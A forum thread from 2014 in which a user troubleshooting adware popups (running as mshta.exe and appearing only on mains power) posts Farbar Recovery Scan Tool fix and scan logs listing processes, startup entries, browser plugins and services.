## raphael100 (May 24, 2014)

Thanks so much for your time ... it seems this one has become a lengthy nightmare for you! I made an interesting discovery today - I have tested it many times now throughout today:


Power Cable Attached = Popups
Battery Power = No Popups


Does this suggest that thing is hidden is hidden in my power settings for different conditions??


I will attach images of my current power setting with and without cable attached.


----------



## raphael100 (May 24, 2014)

Since you mentioned the mshta.exe files - when I go to Windows Task Manager and right click either of the popups and click 'Go To Process' they both show that they are mshta.exe files


----------



## raphael100 (May 24, 2014)

Herewith the images from Task Manager 'Processes' and 'Properties'


----------



## raphael100 (May 24, 2014)

Sorry missed this one:


----------



## raphael100 (May 24, 2014)

.... I have tried it a few times now. If I remove the power cord, the pop-ups that are already open close themselves. Is this getting weird?


----------



## raphael100 (May 24, 2014)

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-06-2014
Ran by Hewlett Packard at 2014-06-04 19:13:45 Run:2
Running from C:\Users\Hewlett Packard\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKLM-x32\...\Run: [] => [X]
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files (x86)\Yahoo!\Shared\npYState.dll No File
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmphkiown.dll
C:\Users\Hewlett Packard\AppData\Local\Temp\{2C7E5FEA-06B3-48D4-A7D7-9EB40D3CB649}.exe
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File
Task: {00D6719A-B2BC-4D31-8498-A765ADFBAC61} - System32\Tasks\DTChk => C:\Users\Public\Util\DTChk.exe [2014-05-20] (Search Results, LLC)
C:\Users\Public\Util\DTChk.exe
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Value deleted successfully.
HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => Key deleted successfully.
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => Key not found.
HKLM\Software\MozillaPlugins\FF Plugin: @microsoft.com/GENUINE - disabled No File => Key not found.
"FF Plugin: @microsoft.com/GENUINE - disabled No File" => not found.
HKLM\Software\Wow6432Node\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 => Key deleted successfully.
C:\Program Files (x86)\Yahoo!\Shared\npYState.dll not found.
HKLM\Software\Wow6432Node\MozillaPlugins\FF Plugin-x32: @microsoft.com/GENUINE - disabled No File => Key not found.
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File not found.
"C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmphkiown.dll" => File/Directory not found.
"C:\Users\Hewlett Packard\AppData\Local\Temp\{2C7E5FEA-06B3-48D4-A7D7-9EB40D3CB649}.exe" => File/Directory not found.
C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll not found.
C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{00D6719A-B2BC-4D31-8498-A765ADFBAC61} => Key not found.
C:\Windows\System32\Tasks\DTChk not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DTChk => Key not found.
"C:\Users\Public\Util\DTChk.exe" => File/Directory not found.

==== End of Fixlog ====


----------



## raphael100 (May 24, 2014)

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-06-2014
Ran by Hewlett Packard (administrator) on HEWLETTPACKARD on 04-06-2014 19:19:27
Running from C:\Users\Hewlett Packard\Desktop
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(HP) C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Windows\SysWOW64\irstrtsv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
() C:\Program Files (x86)\SMART BRO\AssistantServices.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hightail, Inc.) C:\Program Files (x86)\Hightail Desktop App\Hightail.exe
() C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Dropbox, Inc.) C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Windows (R) Win 7 DDK provider) C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
() C:\Program Files (x86)\SMART BRO\UIExec.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ==================

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1424896 2011-10-06] (IDT, Inc.)
HKLM\...\Run: [SetDefault] => C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe [43320 2011-10-01] (Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [Hightail Sync Agent] => C:\Program Files (x86)\Hightail Desktop App\Hightail.exe [7107640 2014-02-13] (Hightail, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-20] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1343904 2012-11-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [FLxHCIm64] => C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe [55536 2013-06-05] (Windows (R) Win 7 DDK provider)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [578944 2012-03-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UIExec] => C:\Program Files (x86)\SMART BRO\UIExec.exe [156448 2012-05-11] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [Buffalo RUNONCE] => C:\BUFFALO\DriveNavi_HD-PUSU3-WR\%SRC_FILE1% /mode:RUNONCE1
HKLM\...\RunOnce: [NCPluginUpdater] - "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update [21720 2014-05-27] (Hewlett-Packard)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6160152 2014-05-20] (Piriform Ltd)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [20922016 2014-02-10] (Skype Technologies S.A.)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com.ph/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}&rlz=1I7MXGB_enID590
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}&rlz=1I7MXGB_enID590
BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\x64\IEBHO.dll (HP)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Skype add-on for Internet Explorer - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\IEBHO.dll (HP)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Skype Browser Helper - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 114.108.193.201 114.108.195.1 192.168.1.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 - C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: DvrClientPlugin - C:\Program Files (x86)\DVRClient Plug-in\npDVRClient.dll ()
FF Plugin HKCU: bluejeans.com/bjninstallplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjninstallplugin_2.6.118.8.dll (Blue Jeans)
FF Plugin HKCU: bluejeans.com/bjnplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjnplugin_2.6.118.8.dll (Blue Jeans)
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\ []
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF [2013-11-25]

Chrome: 
=======
CHR HomePage: hxxp://www.google.com/
CHR StartupUrls: "hxxp://www.google.com/"
CHR DefaultSearchKeyword: ph.yahoo.com
CHR DefaultSearchProvider: Yahoo! Philippines
CHR DefaultSearchURL: http://ph.search.yahoo.com/search?ei={inputEncoding}&fr=crmas&p={searchTerms}
CHR DefaultNewTabURL: 
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll ()
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.450.18) - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java(TM) Platform SE 7 U45) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Live&#153; Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Shockwave for Director) - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll No File
CHR Extension: (Google Docs) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-25]
CHR Extension: (Google Drive) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-25]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-25]
CHR Extension: (YouTube) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-25]
CHR Extension: (Google Search) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-25]
CHR Extension: (Website Logon) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\debkinhcgejcbfgjiaalomcmkedjmiaa [2013-11-25]
CHR Extension: (Yahoo! Toolbar for Chrome) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\eihhgekonheiliaidomffpplfhecmkag [2014-06-03]
CHR Extension: (Skype Click to Call) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-02-21]
CHR Extension: (Norton Identity Safe for Google Chrome) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2013-11-25]
CHR Extension: (Google Wallet) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-25]
CHR Extension: (Gmail) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-25]
CHR HKLM-x32\...\Chrome\Extension: [debkinhcgejcbfgjiaalomcmkedjmiaa] - C:\Program Files (x86)\HP SimplePass 2012\tschrome.crx [2011-08-25]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-04-11]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\Exts\Chrome.crx [2014-05-16]

==================== Services (Whitelisted) =================

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390720 2014-04-11] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1764992 2014-04-11] (Microsoft Corporation)
R2 FPLService; C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe [260424 2011-08-26] (HP)
R2 irstrtsv; C:\Windows\SysWOW64\irstrtsv.exe [184320 2011-07-07] (Intel Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-05] (Symantec Corporation)
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe [276376 2014-05-11] (Symantec Corporation)
R2 UI Assistant Service; C:\Program Files (x86)\SMART BRO\AssistantServices.exe [274760 2012-10-24] ()

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [133672 2011-09-21] (Broadcom Corporation.)
R3 BHDrvx64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys [1530160 2014-05-10] (Symantec Corporation)
R3 BTWDPAN; C:\Windows\System32\DRIVERS\btwdpan.sys [89640 2011-09-21] (Broadcom Corporation.)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-04] (Symantec Corporation)
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1503000.00C\ccSetx64.sys [162392 2013-09-26] (Symantec Corporation)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [484952 2013-11-22] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [137648 2013-11-22] (Symantec Corporation)
